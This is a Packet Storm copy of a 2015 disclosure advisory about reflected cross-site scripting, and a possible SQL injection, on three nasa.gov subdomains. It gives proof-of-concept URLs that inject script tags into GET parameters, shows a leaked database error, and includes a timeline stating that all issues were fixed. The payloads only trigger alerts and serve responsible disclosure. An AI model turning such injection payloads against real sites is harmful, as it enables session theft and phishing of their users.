exploit the possibilities

NASA.gov Cross Site Scripting

NASA.gov Cross Site Scripting
Posted Jan 27, 2015
Authored by Yann CAM

Multiple nasa.gov subdomains suffered from cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
MD5 | 78ab20ccc8774beeb37d85cdc24faadd

NASA.gov Cross Site Scripting

Change Mirror Download
######################################################################
# Exploit Title: NASA.gov sub-domains Multiple vulnerabilities
# Date: 27/01/2015
# Author: Yann CAM @ Synetis - ASafety
# Vendor or Software Link: www.nasa.gov
# Version: /
# Category: Multiple vulnerabilities
# Google dork:
# Tested on: NASA.gov sub-domains
######################################################################

NASA description :
=======================================================================================

The National Aeronautics and Space Administration (NASA) is the United States government agency responsible for the civilian space program as well as
aeronautics and aerospace research.

There are several sub-domains and independent projects within NASA.
Those affected by this advisory are :

- Planetary Data System (PDS) : Reflected Cross-Site Scripting (RXSS)
- NASA’s Archive of Data on Energetic Phenomena (HEASARC) : Reflected Cross-Site Scripting (RXSS)
- Direct Readout Laboratory (directreadout) de la NASA : Reflected Cross-Site Scripting (RXSS) and potential SQLi.


Vulnerability description :
=======================================================================================
Reflected XSS are available in each nasa.gov sub-domain above.
Through this kind of vulnerability, an attacker could tamper with page rendering, redirect victims to fake NASA portals, or capture NASA's users credentials such cookies.
These reflected XSS are on GET variables and are not properly sanitized before being used in pages.


Planetary Data System (PDS) - pds.nasa.gov - PoC :
=======================================================================================

A non-persistent XSS (RXSS) in "INSTRUMENT_HOST_ID" GET param is available in the pds.nasa.gov sub-domain.
Tested on Firefox 33.0.

PoC:

http://pds.nasa.gov/ds-view/pds/viewHostProfile.jsp?INSTRUMENT_HOST_ID=NH<img src='x' onerror='alert(/Reflected XSS - Yann CAM @ASAfety/)' />


NASA’s Archive of Data on Energetic Phenomena (HEASARC) - heasarc.gsfc.nasa.gov - PoC :
=======================================================================================

A non-persistent XSS (RXSS) in "sid" GET param is available in the heasarc.gsfc.nasa.gov sub-domain.
Tested on Firefox 33.0.

PoC:

http://heasarc.gsfc.nasa.gov/vo/validation/vresults.pl?show=details&sid=1337<script>alert(/Reflected XSS - Yann CAM @ASAfety/)</script>&runid=539653&switch=no

http://heasarc.gsfc.nasa.gov/vo/validation/vresults.pl?show=oldtests&sid=1337'><script>alert(/Reflected XSS - Yann CAM @ASAfety/)</script>&runid=539653


Direct Readout Laboratory (directreadout) - directreadout.sci.gsfc.nasa.gov - PoC :
=======================================================================================

A non-persistent XSS (RXSS) and potential SQLi in "cid" GET param is available in the directreadout.sci.gsfc.nasa.gov sub-domain.
Tested on Firefox 33.0.

PoC:

http://directreadout.sci.gsfc.nasa.gov/?id=dspContent&cid=159---><img src=x onerror='alert(/Reflected XSS | SQLi - Yann CAM @ASAfety/);' />

Error in source code :

Diagnostics:<br>
Invalid data 159---><img src=x onerror='alert(/Reflected XSS | SQLi - Yann CAM @ASAfety/);' /> for CFSQLTYPE CF_SQL_INTEGER. <br>The error occurred on line 13.


Screenshots :
=======================================================================================

- http://www.asafety.fr/data/20140824-nasa001.png
- http://www.asafety.fr/data/20140824-nasa002.png
- http://www.asafety.fr/data/20140824-nasa003.png
- http://www.asafety.fr/data/20140824-nasa004.png
- http://www.asafety.fr/data/20140824-nasa005.png


Solution:
=======================================================================================

Fixed by each NASA Portal's team.


Additional resources :
=======================================================================================

- http://www.nasa.gov/
- http://pds.nasa.gov/
- http://heasarc.gsfc.nasa.gov/
- http://directreadout.sci.gsfc.nasa.gov/
- http://www.asafety.fr/vuln-exploit-poc/contribution-nasa-sous-domaines-multiples-vulnerabilites/
- http://www.synetis.com


Report timeline :
=======================================================================================

2014-10-31 : Each NASA Portal's team was alerted by email.
2014-10-31 : PDS team feedback with thanks.
2014-11-04 : PDS and HEASEARC portals fixed.
2014-12-04 : Second email to DRL team to get a status.
2014-12-27 : Account creation on DRL portal to send tp the DRL team through contact form.
2015-01-07 : DRL portal seems to be fixed. All vulnerabilities are fixed on each portal.
2015-01-27 : Public advisory

Credits :
=======================================================================================

88888888
88 888 88 88
888 88 88
788 Z88 88 88.888888 8888888 888888 88 8888888.
888888. 88 88 888 Z88 88 88 88 88 88 88
8888888 88 88 88 88 88 88 88 88 888
888 88 88 88 88 88888888888 88 88 888888
88 88 88 8. 88 88 88 88 88 888
888 ,88 8I88 88 88 88 88 88 88 .88 .88
?8888888888. 888 88 88 88888888 8888 88 =88888888
888. 88
88 www.synetis.com
8888 Consulting firm in management and information security

Yann CAM - Security Consultant @ Synetis | ASafety

--
SYNETIS | ASafety
CONTACT: www.synetis.com | www.asafety.fr
Login or Register to add favorites

File Archive:

August 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    3 Files
  • 2
    Aug 2nd
    2 Files
  • 3
    Aug 3rd
    32 Files
  • 4
    Aug 4th
    22 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    19 Files
  • 7
    Aug 7th
    6 Files
  • 8
    Aug 8th
    1 Files
  • 9
    Aug 9th
    2 Files
  • 10
    Aug 10th
    27 Files
  • 11
    Aug 11th
    11 Files
  • 12
    Aug 12th
    11 Files
  • 13
    Aug 13th
    17 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close